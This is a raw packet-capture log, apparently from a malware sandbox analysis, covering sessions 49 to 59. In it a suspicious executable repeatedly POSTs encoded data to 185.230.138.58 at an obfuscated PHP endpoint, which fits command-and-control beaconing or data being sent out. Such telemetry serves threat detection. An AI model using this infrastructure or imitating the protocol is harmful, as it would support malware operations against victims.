                                                                                                                                        Dec 21, 2024 10:08:26.623229980 CET1892OUTData Raw: 57 56 5f 5d 5a 47 51 54 5b 59 51 56 59 5c 58 5f 56 5f 5d 5d 5a 5c 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WV_]ZGQT[YQVY\X_V_]]Z\[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!A;;4/<%?*>4==>%8%(7$$]$*]$*'^& X/0
                                                                                                                                        Dec 21, 2024 10:08:27.547636986 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:27.784018040 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:27 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 02 22 1b 0e 0d 31 04 27 53 33 3d 25 03 3c 3e 2f 17 27 02 2e 1d 37 0a 37 06 29 2c 30 02 24 58 32 5c 33 3c 28 57 3f 20 2f 5d 3a 1a 20 46 04 1c 20 05 3f 23 0b 0b 2a 06 24 59 2d 38 2a 07 2b 54 26 17 23 3c 26 05 20 2e 36 5c 34 08 35 50 2a 3a 21 08 3e 24 30 5b 2e 10 08 11 35 3a 23 56 0b 1f 3a 0b 3d 30 03 06 30 34 3c 5e 25 24 22 12 23 1f 33 19 22 1c 24 08 35 03 23 59 26 38 29 02 20 3b 34 1f 2a 3f 2a 5f 32 00 24 54 39 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&"1'S3=%<>/'.77),0$X2\3<(W? /]: F ?#*$Y-8*+T&#<& .6\45P*:!>$0[.5:#V:=004<^%$"#3"$5#Y&8) ;4*?*_2$T9=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        49192.168.2.449847185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:26.399558067 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:26.748275042 CET1012OUTData Raw: 52 53 5f 5d 5f 49 51 53 5b 59 51 56 59 5f 58 5f 56 5b 5d 5a 5a 5e 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_]_IQS[YQVY_X_V[]ZZ^[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX";$7$2?**S#=&_*$]&5(U0>$X&':^$*'^& X/<
                                                                                                                                        Dec 21, 2024 10:08:27.643635988 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:27.887470007 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:27 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        50192.168.2.449853185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:28.134578943 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:28.482656956 CET1012OUTData Raw: 57 5f 5f 50 5f 42 51 5e 5b 59 51 56 59 53 58 58 56 53 5d 58 5a 5d 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W__P_BQ^[YQVYSXXVS]XZ][@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!-1'##X%*Y)%4!+/4Z%+:+)<3+$'.X'*'^& X/
                                                                                                                                        Dec 21, 2024 10:08:29.383244038 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:29.612422943 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:29 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        51192.168.2.449859185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:29.854614973 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:30.201577902 CET1012OUTData Raw: 57 5e 5f 5e 5a 42 51 57 5b 59 51 56 59 5c 58 58 56 5f 5d 5c 5a 5d 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W^_^ZBQW[YQVY\XXV_]\Z][H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C,$!?#&<*X)7>*^=?%^)[<9&>0^$'"_$'^& X/0
                                                                                                                                        Dec 21, 2024 10:08:31.118191004 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:31.352412939 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:30 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        52192.168.2.449864185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:31.601291895 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:31.951368093 CET1012OUTData Raw: 57 57 5f 5f 5a 45 51 52 5b 59 51 56 59 5d 58 5b 56 52 5d 5c 5a 5d 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WW__ZEQR[YQVY]X[VR]\Z][G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/2<#,X%6[).. >->('8"<W'.304"\3:'^& X/
                                                                                                                                        Dec 21, 2024 10:08:32.848927975 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        53192.168.2.449866185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:32.915721893 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:33.263979912 CET1892OUTData Raw: 57 55 5a 5b 5f 40 54 56 5b 59 51 56 59 5e 58 5a 56 5b 5d 5c 5a 5a 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WUZ[_@TV[YQVY^XZV[]\ZZ[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"8?#/Y%Z=2W"=*)//%8*?:33><'7_''^& X/8
                                                                                                                                        Dec 21, 2024 10:08:34.165041924 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:34.400398016 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:33 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 5d 35 1b 3b 52 26 04 3b 1e 25 2d 22 5b 28 10 20 07 24 05 31 0a 23 1d 1a 15 3d 2f 2f 1e 24 2e 22 58 33 3f 37 0e 3e 30 0d 5c 39 30 20 46 04 1c 23 58 2b 0d 0c 19 29 16 02 14 2d 38 3a 02 29 32 2e 5d 35 02 31 10 21 2e 0c 16 20 21 26 0b 3c 5f 31 0b 3e 24 2c 1d 3a 07 22 13 22 2a 23 56 0b 1f 39 52 29 1e 00 5f 30 09 1a 5d 32 37 2e 1c 20 08 33 1a 35 31 27 55 35 04 28 03 25 3b 3e 10 21 16 3b 0c 28 3f 3a 12 24 39 0a 50 2d 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%]5;R&;%-"[( $1#=//$."X3?7>0\90 F#X+)-8:)2.]51!. !&<_1>$,:""*#V9R)_0]27. 351'U5(%;>!;(?:$9P-=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        54192.168.2.449868185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:33.047427893 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:33.404531956 CET1012OUTData Raw: 57 5f 5a 5f 5f 45 51 5e 5b 59 51 56 59 5b 58 50 56 58 5d 5d 5a 5d 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W_Z__EQ^[YQVY[XPVX]]Z][C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/"7'%:[*>*V4]>,+'8!X(0,\$4&X':'^& X/,
                                                                                                                                        Dec 21, 2024 10:08:34.293306112 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:34.534173012 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:34 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        55192.168.2.449873185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:34.771074057 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:08:35.123272896 CET1012OUTData Raw: 52 50 5a 5a 5f 41 51 50 5b 59 51 56 59 58 58 5f 56 5b 5d 5e 5a 5d 5b 46 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RPZZ_AQP[YQVYXX_V[]^Z][F[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",8 <,$/&^>2 X&=$[28!X+9'X;'\0'^& X/
                                                                                                                                        Dec 21, 2024 10:08:36.015894890 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:36.248550892 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:35 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        56192.168.2.449878185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:36.492584944 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:36.842279911 CET1012OUTData Raw: 52 53 5a 5b 5a 42 51 57 5b 59 51 56 59 5b 58 5c 56 59 5d 58 5a 50 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RSZ[ZBQW[YQVY[X\VY]XZP[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX", <<2==7=*<&"?'X?&7$*'^& X/,
                                                                                                                                        Dec 21, 2024 10:08:37.736613989 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:37.976358891 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:37 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        57192.168.2.449884185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:38.225266933 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:38.576462984 CET1012OUTData Raw: 52 52 5f 58 5f 43 54 52 5b 59 51 56 59 5d 58 50 56 5f 5d 58 5a 5f 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_X_CTR[YQVY]XPV_]XZ_[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"-"$#?7^1<X*- X=*/Z2;)Y):+3.]07''^& X/
                                                                                                                                        Dec 21, 2024 10:08:39.468468904 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        58192.168.2.449887185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:39.624073982 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:39.982688904 CET1892OUTData Raw: 57 56 5f 5a 5a 40 54 53 5b 59 51 56 59 52 58 5b 56 59 5d 57 5a 5a 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WV_ZZ@TS[YQVYRX[VY]WZZ[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!@/"# /'1/*Z)V4>>[+,$2![+7V0,X'Q60'^& X/
                                                                                                                                        Dec 21, 2024 10:08:40.884989023 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:08:41.120949984 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:08:40 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 00 35 43 30 0a 26 03 0e 0d 30 3e 25 05 2a 3e 38 03 24 12 03 0a 23 33 27 01 3e 3f 27 5c 24 2d 3d 06 33 2f 34 1e 3c 23 2b 1f 2d 1a 20 46 04 1c 23 58 28 30 2a 56 2a 5e 30 5c 2f 28 29 58 2b 1c 07 07 21 5a 22 02 21 3d 3e 5a 20 21 22 0d 2a 2a 3a 56 2a 34 27 07 2e 00 03 00 21 3a 23 56 0b 1f 39 1f 2b 33 3a 12 26 24 28 5d 26 09 32 1f 20 18 2b 53 21 22 05 55 35 3d 34 05 25 28 2a 5a 35 06 2f 0b 29 01 07 02 32 07 0a 54 2c 2d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&5C0&0>%*>8$#3'>?'\$-=3/4<#+- F#X(0*V*^0\/()X+!Z"!=>Z !"**:V*4'.!:#V9+3:&$(]&2 +S!"U5=4%(*Z5/)2T,-&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        59192.168.2.449891185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:08:39.744057894 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:08:40.092080116 CET1012OUTData Raw: 57 5f 5a 5c 5f 40 51 51 5b 59 51 56 59 5c 58 50 56 5e 5d 58 5a 5a 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
